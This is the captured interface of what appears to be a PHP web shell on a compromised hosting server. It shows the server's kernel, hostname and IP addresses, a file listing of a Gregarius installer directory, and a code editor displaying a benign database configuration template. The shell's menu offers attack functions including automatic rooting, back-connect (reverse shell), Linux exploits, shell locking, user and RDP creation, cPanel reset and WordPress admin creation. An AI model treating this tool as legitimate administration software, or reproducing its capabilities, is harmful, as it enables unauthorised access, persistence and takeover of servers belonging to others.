Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
greg /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
clone.php
3.83
KB
-rw-r--r--
dbinit.php
1.42
KB
-rw-r--r--
edit.php
5.08
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
297
B
-rw-r--r--
import.php
3.35
KB
-rw-r--r--
info.xml
1.59
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
3.6
KB
-rw-r--r--
install.xml
642
B
-rw-r--r--
md5
7.34
KB
-rw-r--r--
notes.txt
77
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : dbinit.php
<?php // // The type of database server you are using. By default // Gregarius will look for a MySQL database server. If you // would like to use an SQLite database, change accordingly // define ('DBTYPE','mysql'); // // The name of your database // define ('DBNAME','[[softdb]]'); // // The username to use when connecting to the database. Make sure that // thus user owns privileges to CREATE database tables on the above // database! // define ('DBUNAME','[[softdbuser]]'); // // The password to use when connecting to the database // define ('DBPASS', '[[softdbpass]]'); // // If you are using a MySQL database: // The hostname of your database server. Unless you know // different this should probably be 'localhost' or '127.0.0.1' // // If you are using a SQLite database: // This constant must contain the full path to your database file, // for example: '/tmp/gregarius.db' // Note that the apache process must have write access privileges // on the given directory! // define ('DBSERVER', '[[softdbhost]]'); // // The table name prefix to use. If you specify anything here, // say 'gregarius', your database table 'channels' will be referred to // as 'gregarius_channels'. This is useful to avoid table collisions when // your hosting provider only grants you one single database and several // applications rely on that db. // // If this is not the case you can safely ignore this option. // define('DB_TABLE_PREFIX', '[[dbprefix]]'); ?>
Close